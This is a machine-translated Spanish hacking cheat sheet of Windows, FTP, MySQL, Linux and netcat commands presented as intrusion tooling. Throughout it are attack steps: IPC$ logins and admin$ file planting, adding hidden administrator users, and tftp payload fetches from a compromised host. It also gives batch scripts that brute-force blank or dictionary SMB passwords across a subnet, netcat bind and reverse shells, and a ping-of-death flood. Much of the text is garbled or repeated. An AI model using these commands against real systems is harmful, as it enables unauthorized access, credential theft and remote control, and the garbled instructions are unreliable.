Esperando!!!!!!!!!!!! Quien lo diga mejor recibirá puntos.
net use\ip\ipc$ "contraseña" /user:"nombre de usuario" Crear enlace no nulo IPC
net use h:\\\contraseña" /usuario:"nombre de usuario" Asigne el C: del otro lado a local como H: después de iniciar sesión directamente: a local como H:
net use h :\ip\c$ Después de iniciar sesión, asigne el C: de la otra parte al H local:
net use \ip\ipc$ /del elimine el enlace IPC
net use h :/ del eliminar asigna otro al H local:
usuario de red nombre de usuario contraseña /add crea un usuario
usuario de red invitado /active:yes activa el usuario invitado
usuario de red Verifique qué usuarios están disponibles
nombre de cuenta de usuario de red Verifique las propiedades de la cuenta
nombre de usuario de administradores de grupo local de red /add Coloque "usuario" en el campo "Usuario"
el nombre de usuario de los administradores del grupo local de red /add predice el campo "usuario". add agrega "usuario" al administrador para que tenga derechos de administrador. Nota: administrador s es plural
net start para ver el. los abiertos
nombre del servicio net start para iniciar el servicio (por ejemplo: net start telnet, net start Schedule)
nombre del servicio net stop para detener un servicio
hora neta\\ ip de destino para verificar la hora de la otra parte
hora de red\\ ip de destino /set establece la hora de la computadora local para sincronizarla con la hora del host "IP de destino"
hora neta\\ ip de destino /establecer "Sincronización de hora del host", agregue el parámetro /yes para cancelar el mensaje de confirmación
vista de red Ver lo que **** disfrutar de la LAN local
net view \\ip Ver lo que **** disfrutar de la otra LAN
net config Mostrar la configuración de red del sistema
cerrar sesión en net Desconecte el sistema de la red.
cierre de sesión de red Desconectar** **disfrute
nombre del servicio de pausa de red para pausar un servicio
net enviar ip "mensaje de texto" enviar información a la otra parte
tipo e información de conexión de red net ver
net config muestra la configuración de red del sistema
el cierre de sesión de red desconecta el sistema de la red.
net share Ver ****disfrutes abiertos localmente <
net share ipc$ enable ipc$***
net share ipc$ /del eliminar ipc $***
net share c$ /del Eliminar C:****
net user guest 12345 Inicie sesión como invitado y cambie la contraseña a 12345. Después de iniciar sesión como invitado, cambie la contraseña a 12345
contraseña net Contraseña Cambie la contraseña de inicio de sesión del sistema
netstat -a para ver los puertos abiertos, netstat -an de uso común
netstat -n Ver la conexión de red en el puerto,
netstat -v Ver el trabajo en progreso
net share c$ /del eliminar C*** share
net share c$ /del Ver el trabajo en curso
netstat -p ejemplo de nombre de protocolo: netstat -p tcq/ip Ver el uso de un determinado protocolo (Ver el uso de tcp/ip protocolo)
netstat -s Ver el uso de todos los protocolos en uso
nbtstat -A ip 136 desde el otro extremo hasta el otro extremo de 139. Si uno de los puertos está abierto, puede ver el nombre de usuario del último inicio de sesión de la otra parte (el anterior a 03 es el nombre de usuario). Nota: el parámetro A debe escribirse en mayúscula
tracert - parámetro ip (o nombre de la computadora)) Ruta de seguimiento (paquete), parámetro: "-w número de dígitos" se usa para establecer el intervalo de tiempo de espera.
Ping ip (o nombre de dominio) envía datos a otro host. El tamaño predeterminado es 32 bytes Parámetro: "-l [espacio] paquete": Parámetro: "-l [espacio] paquete" tamaño ". -n" número de veces para enviar datos "-t" significa siempre hacer ping.
ping -t -l 65550 ip ping of death (enviar archivos de más de 64K y hacer ping todo el tiempo es ping of death)
ipconfig (winipcfg) en Windows NT y XP ( Windows 95 98) se utiliza para ver la dirección IP local. ) Ver la dirección IP local, ipconfig se puede usar con el parámetro "/all" para mostrar toda la información de configuración
tlist -t muestra los procesos en una lista de líneas de árbol (herramientas adicionales para el sistema, no instaladas por predeterminado, en la carpeta Soporte/herramientas del directorio de instalación)
kill -F maneja el proceso, el proceso no está instalado, el proceso no está instalado, el proceso no está instalado, el proceso no está instalado .
elimine el nombre del proceso -F más el parámetro -F para forzar el final del proceso (para las herramientas adicionales del sistema, el valor predeterminado no está instalado, en la carpeta Soporte/herramientas del directorio de instalación)
del -F nombre de archivo más el parámetro -F elimina archivos de solo lectura, /AR, /AH, /AS, /AA significa eliminar archivos de solo lectura, ocultos, del sistema y de archivo respectivamente, /AR, /AH, /AS, /AA significa eliminar archivos de solo lectura, ocultos, del sistema y de almacenamiento. /A-R, /A-H, /A-S, /A-A significa eliminar archivos que no sean archivos de solo lectura, ocultos, del sistema y de almacenamiento. Por ejemplo, "DEL/AR *.*" significa eliminar todos los archivos de solo lectura en el directorio actual, y "DEL/A-S *.*" significa eliminar todos los archivos en el directorio actual excepto los archivos del sistema.
#2 II:
del /S /Q directorio o use: rmdir /s /Q directorio /S para eliminar el directorio y todos los subdirectorios y archivos bajo el directorio.
Al mismo tiempo, puede usar el parámetro /Q para cancelar la confirmación del sistema de la operación de eliminación y luego eliminar el directorio directamente. (Estos dos comandos funcionan de la misma manera)
mover disco \ ruta \ para mover el nombre del archivo de la ruta para almacenar el archivo para mover \ mover el nombre del archivo y usar el parámetro /y para cancelar Confirmar el directorio en movimiento Después de confirmar que existe el mismo archivo, se sobrescribirá directamente
fc one.txt two.txt > 3st.txt Compare los dos archivos y envíe las diferencias a 3st.txt. >" y "> > "El comando es un comando de redirección
en el número de identificación inicia la tarea programada registrada
en /delete detiene todas las tareas programadas; /sí detiene todas las tareas programadas, No se requiere confirmación
en el número de identificación /delete Detiene una tarea programada registrada
en el número de identificación
en el número de identificación /delete Detiene una tarea programada registrada
en el número de identificación /eliminar
en Ver todas las tareas programadas
en (/ip hora) nombre del programa (o comando) /r en un momento determinado Ejecutar el otro programa del grupo y reinicie la computadora
nombre de usuario del dedo @host Ver los usuarios que iniciaron sesión recientemente
puerto ip telnet lejano e inicie sesión en el servidor, el puerto predeterminado es 23
open ip se conecta a IP (que es el comando después de iniciar sesión en telnet)
telnet Si ingresa directamente telnet en la máquina local, ingresará la ruta de copia de telnet local
\ nombre de archivo 1 ruta \ nombre de archivo 2 /y copiar El archivo 1 va al directorio especificado como archivo 2. Utilice el parámetro //y para anular la confirmación del archivo que desea cambiar y también anulará la confirmación del archivo que desea sobrescribir en el directorio existente. .
copiar c:\srv. exe\\ip\admin$ Copiar c:\srv.exe local al administrador del otro lado
cppy 1st.jpg/b+ 2st.txt/a 3st.jpg Oculte el contenido del segundo .jpg en el primer .jpg y genere un nuevo archivo 3st.jpg Nota: el encabezado del archivo 2st.txt debe tener tres líneas vacías. Parámetros: /b se refiere a. archivo binario, /a se refiere al archivo en formato ASCLL
copy\ip\admin$\svv.exe c:\ o:copy\ip\admin$\*.* Copie el archivo srv.exe ( todos los archivos) compartido por la otra parte admini$*** al C local:
xcopy copia archivos o árboles de directorios dirección de destino\nombre del directorio para copiar archivos y árboles de directorios, con el parámetro /Y no será se le solicitará que sobrescriba el mismo archivo
tftp -i own IP (cuando se utiliza una máquina de carne como punto de salto, esta es la IP de la máquina de carne) get server.exe c:\server.exe Después de iniciar sesión en, descargue "IP "server.exe al host de destino c:\server.exe Parámetro: -i Se refiere al modo de transferencia binaria, como la transferencia de archivos exe, como la transferencia en modo ASCII (transmisión del modo de archivo de texto), como no usar -i transferencia.
tftp -i Otra IP pone c:\server.exe Después de iniciar sesión, cargue el c:\server.exe local en el host
El puerto ftp ip se utiliza para cargar archivos al servidor o realizar operaciones de archivos, el puerto predeterminado es 21. bin se refiere a la transmisión binaria (el valor predeterminado es el formato ASCII (para archivos de texto)
la ruta imprime y muestra el enrutamiento IP, mostrando principalmente la dirección de red Dirección de red, máscara de subred Máscara de red y dirección de puerta de enlace addres, dirección de interfaz Interfaz
arp Ver y procesar el caché ARP. ARP es resolución de nombres y es responsable de resolver las IP en direcciones MAC físicas. arp -a mostrará toda la información
iniciar el nombre del programa o comando /max o /min abrir una nueva ventana y maximizar (minimizar) el programa o comando
mem Ver tasa de uso de CPU
Para ver el uso de la CPU, debe usar el siguiente comando atributo filt, ver los atributos del archivo (directorio)
attrib filename -A -R -S -H o +A +R +S +H elimina (agrega) los atributos de archivo, de solo lectura, de sistema y ocultos del archivo; + agrega como atributo
dir Ver el archivo, los parámetros son los siguientes: /Q muestra a qué usuario del sistema pertenecen el archivo y el directorio /T:C muestra la hora de creación del archivo, /T:A muestra la hora del último acceso al archivo, /T:W muestra la hora de la última modificación del archivo<; /p>
fecha /t, hora /t use este parámetro, es decir "Solo muestra la fecha y hora actuales, no es necesario ingresar una nueva fecha y hora
set Especifique el nombre de la variable de entorno = el carácter asignado a la variable Establecer la variable de entorno
set Mostrar todas las variables de entorno actuales
set p (u otro carácter) Muestra todas las variables de entorno actuales que comienzan con el carácter p (o otro carácter)
pausa Pausa el programa por lotes y deja de ejecutarse: presione cualquier tecla para continuar...
si realiza un procesamiento condicional en un programa por lotes (para obtener más información, consulte si. Comandos y variables)
La etiqueta goto dirige cmd.exe a un programa por lotes. Líneas con marcadores (los marcadores deben estar en una línea separada y comenzar con dos puntos, como el marcador ":start")
Llame a ruta\nombre de archivo por lotes para llamar a otro programa por lotes desde dentro del programa por lotes (para obtener más información, consulte llamar a /?)
for ejecuta un comando específico para cada archivo en un conjunto de archivos (para obtener más información, consulte el comando y las variables)
echo on o off activa o desactiva el eco usando solo echo (sin parámetros) muestra la configuración de eco actual
echo; message muestra un mensaje en la pantalla
mensaje de eco & gt; > pass gt ;> pass.txt Guarda "información" en el archivo pass.txt
findstr "Hola" aa. txt Encuentra la cadena hola en el archivo aa.txt
buscar nombre de archivo Buscar archivo
título nombre del título cambia el nombre del título de la ventana CMD
color color valor .
El valor del color establece el color de primer plano y de fondo de la consola cmd 0=negro, 1=azul, 2=verde, 3=verde claro, 4=rojo, 5=púrpura, 6=amarillo; , 7=blanco, 8=gris, 9=azul claro, A=verde claro, B=verde claro, C=rojo claro, D=morado claro, E=amarillo claro, F=blanco
mensaje nombre cambia el nombre del símbolo del sistema que se muestra en cmd.exe (colocando el símbolo del sistema dentro de cmd.exe). exe (ponga el símbolo del sistema en un archivo)
nombre del título Cambie el nombre del título de la ventana cmd (ponga la cadena hola)
nombre del título del título Cambie el nombre de la ventana cmd título. Símbolo del sistema (cambie C:\, D:\ a: EntSky\)
#3:
ver muestra información de la versión en la ventana de DOS
Winver La ventana emergente muestra información de la versión (tamaño de la memoria, versión del sistema, versión del parche, nombre de la computadora)
formatear disco /FS: escriba formatear disco, escriba: FAT, FAT32, NT: FAT, FAT32, NTFS, ejemplo: Formato D:/FS:NTFS
md Nombre del directorio Crear directorio
reemplazar archivo fuente Directorio archivo de reemplazo del archivo a reemplazar
ren Texto original Nombre de archivo nuevo nombre de archivo renombrar nombre de archivo
árbol Muestra el directorio en una estructura de árbol. Directorio, el parámetro -f enumera los nombres de archivos en la primera carpeta
escribir nombre de archivo muestra el contenido del archivo de texto
más nombre de archivo muestra el archivo de salida pantalla por pantalla
comando de bloqueo de doskey = char
comando de desbloqueo de doskey = comando de bloqueo proporcionado para DOS (edición de líneas de comando, recuperación de comandos de win2k y creación de macros). Por ejemplo, comando lock dir: doskey dir=entsky (doskey dir=dir no se puede usar desbloquear: doskey dir=
taskmgr llama al administrador de tareas
chkdsk /F D: verificar); disco D y mostrar informe de estado; agregue el parámetro /f y corrija errores en el disco
tlntadmn telnt service admn, escriba tlntadmn seleccione 3, luego seleccione 8, puede cambiar el puerto predeterminado 23 del servicio telnet a cualquier otro puerto;
salir sale del programa cmd.exe o del programa actual. Utilice el parámetro /B para salir del script por lotes actual en lugar de la ruta de acceso de cmd.exe
(el nombre del archivo). archivo ejecutable) se puede establecer La ruta al archivo ejecutable.
cmd inicia una ventana de interpretación de comandos de win2K. Parámetros: /eff, /en deshabilitar, habilitar la expansión del comando; consulte cmd /?
regedit /s nombre de archivo de registro importa el registro; el parámetro /S se refiere a la importación en modo silencioso sin ningún mensaje;
regedit /e nombre de archivo de registro exporta el registro
El parámetro de nombre de archivo cacls muestra o modifica la lista de control de acceso a archivos (ACL) - - para formato NTFS. -Para formato NTFS. Parámetros: /D nombre de usuario:set deniega el acceso al usuario; /P nombre de usuario:perm reemplaza los derechos de acceso del usuario especificado; /G nombre de usuario:perm otorga derechos de acceso al usuario especificado. Puede ser: por ejemplo: cacls D:\test; .txt /D pub set d:\test.txt deniega el acceso al usuario del pub.
nombre de archivo cacls Ver la lista de permisos de usuario para acceder al archivo
Contenido de texto REM Agregar comentarios al archivo por lotes
netsh Ver o cambiar la configuración de la red local
#4 IV:
Comando de servicio IIS:
iisreset /reboot Reinicie la computadora Win2k (pero se mostrará un mensaje indicando que el sistema se reiniciará)
iisreset /start o stop Iniciar todos los servicios de Internet
iisreset /restart Detener y reiniciar todos los servicios de Internet
iisreset /status Mostrar el estado de todos los servicios de Internet Habilitar (deshabilitar) Reiniciar el servicio de Internet local en el sistema
iisreset /rebootonerror Habilita (deshabilita) el reinicio del servicio de Internet en el sistema local
iisreset /rebootonerror Si ocurre un error al iniciar, detener , o reiniciando el servicio de Internet, luego Reinicie el sistema, reinicie el sistema.
iisreset /noforce Val no forzará la finalización del servicio de Internet si no se puede detener
iisreset /timeout Val no detendrá el servicio de Internet cuando el parámetro de tiempo de espera (en segundos) sea alcanzado, si se especifica /noforce. parámetro rebootonerror, la computadora se reiniciará. Los valores predeterminados son 20 segundos para reiniciar, 60 segundos para detener y 0 segundos para reiniciar.
Comando FTP: (los detalles se explicarán más adelante)
El formato de la línea de comando ftp es el siguiente:
ftp -v -d -i -n - g[nombre de host]. -v muestra toda la información de respuesta del servidor remoto.
-d Utiliza la depuración.
-n restringe ftp a inicios de sesión automáticos, es decir, no utiliza archivos .netrc.
-g Cancela el nombre del archivo global.
ayuda [comando] o ?[comando] Ver descripción del comando
adiós o salir Finalice el proceso FTP del host y salga del modo de administración de FTP.
pwd enumera el directorio del host remoto actual
poner o enviar nombre de archivo local [nombre de archivo cargado al host] transferir archivos locales al host remoto
get o recv [nombre-archivo-host-remoto] [nombre-archivo descargado local] Transfiere archivos desde un host remoto a un host local
mget [archivos-remotos] Transfiere archivos desde un host remoto a un host local. archivos remotos] Recibir un lote de archivos desde el host remoto al host local
mput local-files Transferir un lote de archivos desde el host local al host remoto
dir o ls [directorio-remoto] [archivo-local] Lista los archivos en el directorio del host remoto actual. Si hay un archivo local, el resultado se escribirá en el archivo local
ascii establece el archivo que se transferirá en formato ASCII (predeterminado)
bin o image establece el archivo en transferirse en formato binario
p>
la campana suena una alerta cada vez que se transfiere un archivo
cdup regresa al directorio anterior
cerrar interrumpe el Transferencia ftp al servidor remoto.
close interrumpe la sesión ftp con el servidor remoto (correspondiente a open)
open host[port] establece una conexión con el servidor ftp especificado y usted puede especificar el puerto para conectarse
eliminar elimina los archivos del host remoto en
mdelete [archivos-remotos] elimina un lote de archivos sistema muestra el tipo de sistema del host remoto
usuario nombre de usuario [contraseña] [cuenta ] use un nombre de usuario diferente para volver a iniciar sesión en el host remoto
abrir el host [puerto] restablecer una nueva conexión
modo de aviso interactivo rápido
macdef define comando macro
lcd Cambia el directorio de trabajo del host local actual de forma predeterminada, irá al directorio INICIO del usuario actual
chmod cambia los permisos de archivos en el host remoto;
Cuando se abre el caso, use el comando MGET. Los nombres de los archivos copiados en la computadora local se convertirán a letras minúsculas
cd remote-dir para ingresar al directorio del host remoto
cdup para ingresar al directorio principal del directorio del host remoto
! Ejecute un shell interactivo en esta máquina y vuelva al entorno ftp, como por ejemplo! ls*.zip
#5 Cinco:
Comando MYSQL:
mysql -h dirección de host -u nombre de usuario -p contraseña para conectarse a MYSQL si; solo está instalado MYSQL y el superusuario root no tiene contraseña.
(Ejemplo: mysql -h110.110.110.110 -Uroot -P123456
Nota: u y root no pueden usar espacios, el resto son iguales)
salir Salir de MYSQL
mysqladmin -u nombre de usuario -p contraseña antigua nueva contraseña cambiar contraseña
conceder selección en la base de datos.* al nombre de usuario@inicio de sesión host identificado por ("contraseña/"); Agregar nuevo usuario. (Nota: a diferencia de lo anterior, los siguientes comandos van seguidos de un punto y coma como terminador de comando, porque son comandos en el entorno MYSQL.
mostrar bases de datos; muestra la lista de bases de datos. Solo hay dos bases de datos en el principio: mysql y prueba. La biblioteca mysql es muy importante porque contiene información del sistema sobre MYSQL y la usamos para cambiar contraseñas y agregar nuevos usuarios
use mysql
show. tablas; mostrar las tablas en la biblioteca
describir el nombre de la tabla; mostrar la estructura de la tabla
crear base de datos
usar el nombre de la biblioteca; p>
crear tabla nombre de tabla (lista de campos); crear tabla; crear tabla
eliminar biblioteca de base de datos;
eliminar tabla de base de datos y tabla;
eliminar de la tabla; borrar registros de la tabla
seleccionar * de la tabla; mostrar registros de la tabla
mysqldump --opt school>school.bbb Copia de seguridad de la base de datos: ( El comando se ejecuta en DOS); Nota: Haga una copia de seguridad de la base de datos de la escuela en el archivo school.bbb. School.bbb es un archivo de texto. Ábralo y encontrará nuevos descubrimientos.
Nuevo comando de Win2003 (parte práctica):
shutdown /parameters apaga o reinicia el host local o remoto.
Descripción del parámetro: /S apaga el host, /R reinicia el host, /T el número establece el tiempo de retardo, que oscila entre 0 y 180 segundos, /A cancela el arranque, /M //IP especifica el host remoto.
Ejemplo: apagado /r /t 0 Reiniciar el host local inmediatamente (sin demora)
taskill /parameters nombre del proceso o pid del proceso Terminar una o más tareas y procesos.
Descripción del parámetro: / El pid del proceso que se va a terminar, use el comando de lista de tareas para obtener el pid de cada proceso; /IM El nombre del proceso que se va a terminar /F Terminar con fuerza el proceso; ; /T Termina el proceso especificado y el proceso secundario lo inicia.
La lista de tareas muestra los procesos, servicios y el identificador de proceso (PID) de cada servicio que se ejecuta actualmente en hosts locales y remotos.
Descripción del parámetro: /M enumera los archivos dll cargados por el proceso actual, /SVC muestra los servicios correspondientes a cada proceso, sin parámetros, solo se enumera el proceso actual.
#6 Seis:
Comandos básicos de Linux: distingue entre mayúsculas y minúsculas
uname muestra información de la versión (igual que la versión Win2K)
muestra el directorio archivos en el directorio actual, ls -al muestra archivos ocultos (igual que el directorio de Win2K)
pwd consulta el directorio actual.
cd cd. Regresa al directorio anterior. Observa el espacio entre cd y.... cd / regresa al directorio raíz.
cat filename Ver el contenido del archivo
cat >abc.txt Escribe el contenido de abc.txt en el archivo.
más nombre de archivo muestra un archivo de texto en formato página por página.
cp copia archivos
mv mueve archivos
rm nombre de archivo elimina archivos, rm -a nombre de directorio elimina directorios y subdirectorios
directorio mkdir name crea un directorio
rmdir elimina un subdirectorio y no hay archivos en el directorio.
chmod establece permisos de acceso para archivos o directorios
grep busca cadenas en archivos
diff compara archivos en archivos
find Buscar en archivos
fecha, fecha y hora actuales
quién Encuentra personas que actualmente trabajan en la misma máquina que tú, y cuándo y dónde iniciaron sesión. Ubicación
w Encuentra detalles de la persona actualmente en la máquina
whoami Ver el nombre de tu cuenta
grupos Ver los grupos de alguien
contraseña Cambiar historial de contraseñas
Ver los comandos que has emitido
ps Mostrar el estado del proceso
pd Cambiar contraseña
historial Ver tus comandos emitidos
proceso ps
proceso kill stop
proceso kill stop
gcc Los piratas informáticos suelen utilizarlo para compilar y escribir en archivos de lenguaje C
su cambia privilegios al usuario especificado
telnet IP telnet se conecta al host de la otra parte (igual que Win2K). Cuando aparece bash$, la conexión es exitosa.
servidor de conexión ftp ftp (igual que Win2K)
Adjunto: Comandos y variables por lotes
1: Formato básico para comandos y variables:
FOR /parameters %variable IN (establecer) comando DO [command_parameters] %variable: especifique un parámetro que se utilizará como parámetro. variable: especifica un parámetro reemplazable de una sola letra; por ejemplo, las variables distinguen entre mayúsculas y minúsculas (%i no es igual a %I).
El rango de variables que el procesamiento por lotes puede procesar cada vez es %0-%9***10, donde %0 es el nombre del archivo por lotes de manera predeterminada y %1 es la primera entrada cuando se usa este lote. , de manera similar: %2-%9 se refiere al valor ingresado del 2 al 9, por ejemplo: net use \ip\ipc$ pass /user:user donde ip es %1,pass es %2,user es %3 <. /p>
(set): Especifique un archivo o un grupo de archivos, puede usar comodines, por ejemplo: (D:\ipc$) /user:user (D:\ipc$) /user:user ( D: \ipc$)
(set): Especifique un archivo o un grupo de archivos, puede usar comodines, por ejemplo: (D:\ipc$) /user:user (D:\ipc $)Por ejemplo: (D:\ipc$) D:\user.txt) y (1 1 254)(1 -1 254),{ "(1 1 254) "El primer "1" se refiere al valor inicial , el segundo "1" se refiere a la cantidad de crecimiento, Tres "254" se refiere al valor final, es decir: de 1 a 254; "(1 -1 254)" descripción: es decir, de 254 a 1 }
: especifica que se ejecutará en el primer comando de archivo, por ejemplo: comando net use. Por ejemplo: comando net use; si desea ejecutar varios comandos, agregue: & para separar comandos
command_parameters: especifique parámetros o modificadores de línea de comando para un comando específico
IN ( set): significa Valor en (set); DO comando: Indica ejecutar el comando
Parámetros: /L significa usar la forma incremental {cuando (set) es incremento} /F significa continuar obteniendo valores ; del archivo, hasta que se complete la búsqueda {cuando (set) sea un archivo, como (d:\pass.txt)}.
Ejemplo de uso:
@echo off
formato de uso de eco: test.bat *.*.* > test.txt
para /L %%G en (1 1 254) haga eco %1.%%G >>test.txt y use net \%1.%%G /user:administrator busque "Comando completado exitosamente" >>prueba. txt
Guardar como test.bat Descripción: Intente utilizar una contraseña de administrador en blanco para establecer conexiones IPC$ para 254 IP en el segmento de red Clase C especificado en secuencia. Si tiene éxito, guarde las IP en test.txt. .
/L significa forma creciente (es decir, de 1-254 o 254-1); ingrese los primeros tres dígitos de la IP: *.*.* es el valor predeterminado del lote %1; una variable (el último dígito de ip); & se usa para separar los comandos echo y net | se refiere a crear ipc$ y verificar si hay un mensaje de "comando completado exitosamente" en los resultados de la búsqueda; %G Es la dirección IP completa (1 1 254) se refiere al valor inicial, cantidad de crecimiento y valor final.
@echo desactivado
formato de eco: ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
Guardar como: ok.exe Nota: Después de ingresar la dirección IP, use el archivo de diccionario d:\pass.dic para ingresar la dirección IP. :\pass.dic Storm la contraseña del usuario en d:\user.dic hasta que se recupere el valor en el archivo. %%i es el nombre de usuario; %1 es la dirección IP ingresada (predeterminada).
#7 Siete:
2: Si el formato básico del comando y la variable:
IF [not] número de nivel de error declaración de comando si la salida se devuelve cuando el El programa finaliza. La condición especificada es "verdadera" si el código es igual o mayor que el número especificado.
Ejemplo: IF errorlevel 0 IF errorlevel 0 comando significa que si el valor devuelto después de ejecutar el programa es 0, se ejecutará el comando después de la línea de valor IF no errorlevel 1 IF not errorlevel 1 comando significa; que si el programa Si el valor devuelto al final de la ejecución no es igual a 1, se ejecutarán los siguientes comandos.
0 significa que se encontró y se ejecutó correctamente (verdadero); 1 significa que no se encontró ni se ejecutó (falso).
IF [not] String 1 == Sentencia de comando String 2 Si la cadena de texto especificada coincide (es decir, String 1 es igual a String 2), se ejecuta el siguiente comando.
Ejemplo: "if "%2%"=="4" goto start "significa: si la segunda variable ingresada es 4, ejecute el siguiente comando (nota: use %nombre de variable % Llame a la variable y add " ")
SI [no] existe declaración de comando de nombre de archivo Si el nombre de archivo existe, ejecute el siguiente comando.
Ejemplo: "si no nc.exe ir al final" significa: si no se encuentra el archivo nc.exe, salte a la marca ":end".
IF [not] número de nivel de error declaración de comando else declaración de comando o IF [not] cadena1==cadena2 declaración de comando else declaración de comando o IF [no] existe nombre de archivo declaración de comando else declaración de comando más: else declaración de comando It significa: cuando la condición anterior no es verdadera, el comando después del comando else. Nota: El comando else debe estar en la misma línea que el comando if para que sea válido.
Cuando hay un comando del, debe encerrar todo el contenido del comando del con < >, porque el comando del debe ejecutarse en una línea separada y la línea después de < > es una línea separada, por ejemplo, "if; existe test.txt. < del test.txt .> else echo test.txt.missing", preste atención al "." en el comando
(2) Comandos externos del sistema (ambos requieren la descarga de herramientas relevantes) ):
1. Navaja suiza:nc.exe
Descripción del parámetro:
-h Ver información de ayuda
-d Antecedentes modo
-e Redirección del programa, Una vez realizada la conexión [PELIGRO]
-i segundo intervalo de retardo
-l modo de escucha, para conexiones entrantes
-L modo de escucha, incluso si Sky cierra la conexión, continúa monitoreando hasta CTR+C
-n dirección IP, no nombre de dominio
-o película graba transmisión hexadecimal
-p [espacio] puertos número de puerto local
-r puerto local y remoto aleatorio
-t Usa Telnet para interactuar
-u modo UDP
-v salida detallada, use -vv para obtener más detalles
-w intervalo de retardo de tiempo de espera digital
- z cerrar entrada y salida (para barrido de anclas)
Uso básico:
nc -nvv 192.168.0.1 80 Conéctese al puerto 80 en el host 192.168.0.1
nc -l -p 80 Abra el puerto TCP local 80 y escuche
nc -nv -w2 -z 192.168.0.1 80-1024 Escanee el puerto 80-1024 en el ancla 192.168.0.1
nc -l -p 5354 -t -e c:winntsystem32cmd.exe Vincula el cmdshell del host remoto al puerto TCP remoto 5354
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 Tipo en el cmdshell del host remoto y conéctese de manera inversa al puerto 5354 de 192.168.0.
2
Uso avanzado:
nc -L -p 80 como honeypot 1: habilita y continúa escuchando el puerto 80 hasta CTR+C
nc -L -p 80 > c:\log.txt como honeypot 2: abra y continúe escuchando el puerto 80 hasta CTR+C, y envíe los resultados a c:\log.txt
nc -L -p 80 < c:\honeyport.txt como honeypot 3-1: Abra y escuche el puerto 80 hasta CTR+C, luego envíe el contenido de c:\honeyport.txt al pipe, que también se puede usar para transferir archivos
type.exe c:\honeyport | nc -L -p 80 Como honeypot 3-2: abra y escuche el puerto 80 hasta CTR+C, luego envíe el contenido de c:\honeyport.txt a la tubería , también se puede utilizar para transferir archivos
type.exe c:\honeyport | nc -L -p 80 Como honeypot 3-3: abre y escucha el puerto 80 hasta CTR+C, y luego c :\honeyport.txt ingresa a la tubería y también se puede usar para transferir archivos
Para la máquina local: nc -l -p puerto local
Para el otro host final: nc - e cmd.exe IP local -p puerto local *win2K
nc -e /bin/sh IP local -p puerto local *linux, conexión inversa unix, rompiendo el firewall del otro host
Uso local: nc -d -l -p puerto local & lt; La ruta y el nombre del archivo a transferir
En el otro host: nc -vv IP local puerto local> El ruta y nombre del archivo que se almacenará Nombre Transferir archivos a otro host
Nota:
| Comando de canalización
< o > Comando de redirección. "<", por ejemplo: tlntadmn @ significa ejecutar el comando después de @, pero no mostrarlo (ejecutar en segundo plano); por ejemplo, @dir c :\winnt > ;> d:\log.txt significa: ejecutar el directorio en segundo plano y almacenar el resultado en d:\log.txt > > vs > > "> "y"> " La diferencia es: sobrescribir; y ">>" significa: guardar en (agregar a). Por ejemplo, @dir c:\winnt >> d:\log.txt y @dir c:\winnt > d:\log.txt se ejecutan dos veces respectivamente. Para comparar, utilice el resultado de. >> es que el segundo resultado se guarda, y usar: > tiene solo un resultado porque el segundo resultado sobrescribe el primer resultado. #8 Ocho: 2. Herramienta de escaneo de anclaje: xscan.exe Formato básico xscan -host xscan.exe es una herramienta que puede escanear todos los hosts de las herramientas de punto de anclaje. p> xscan -file Elemento de detección -active detecta si el host está vivo -os detecta el tipo de sistema operativo remoto (a través de protocolos NETBIOS y SNMP) -port detecta el estado del puerto de servicios comúnmente utilizados -ftp Detecta contraseñas FTP débiles -pub Detecta el acceso de escritura de usuarios anónimos a servicios FTP -pop3 Detecta contraseñas débiles en servidores POP3 -smtp Detectar vulnerabilidades del servidor SMTP -smtp Detectar vulnerabilidades del servidor SMTP -smtp Detectar vulnerabilidades del servidor SMTP -sql Detectar servidor SQL contraseñas débiles -smb detecta contraseñas débiles del servidor NT -iis detecta vulnerabilidades de codificación/decodificación IIS -cgi detecta vulnerabilidades CGI -nasl cargando script de ataque Nessus -all detecta todo lo anterior Otras opciones -i número de adaptador establece el adaptador de red, <el número de adaptador se puede utilizar con "-l" Adquisición de parámetros -l Mostrar todos los adaptadores de red -v Mostrar el progreso del escaneo en detalle -p Omitir hosts que no responden -o omite los hosts sin vulnerabilidades abiertas detectadas -o omite los hosts sin vulnerabilidades abiertas detectadas -o omite los hosts sin puertos abiertos detectados -t El número de subprocesos simultáneos y el número de hosts simultáneos especifica el número máximo de subprocesos y hosts simultáneos, el valor predeterminado es 100,10 -el nombre del archivo de registro especifica el archivo del informe de escaneo nombre (sufijo: archivo TXT o HTML) Ejemplo de uso Omitir hosts que no responden xscan -host 192.168.1.1- 192.168.255.255 -port -smb - t 150 -o detecta el estado del puerto estándar de los hosts en el segmento de red 192.168.1.1-192.168.255.255. txt "Estado del puerto estándar de todos los hosts enumerados en el archivo, vulnerabilidades CGI, el número máximo de subprocesos simultáneos es 200, se pueden detectar hasta 5 hosts al mismo tiempo, se muestra el progreso de detección detallado datagrama UDP de salida udp -icmp Datagrama ICMP de salida -pasar información de contraseña del filtro -ocultar ejecución en segundo plano -host resolver nombre de host -addr dirección IP de filtrado de dirección IP -puerto puerto de filtrado -nombre del archivo de registro guardar la salida en el archivo -salida asc en codificación ASCII salida -hex en codificación hexadecimal Ejemplo de uso xsniff.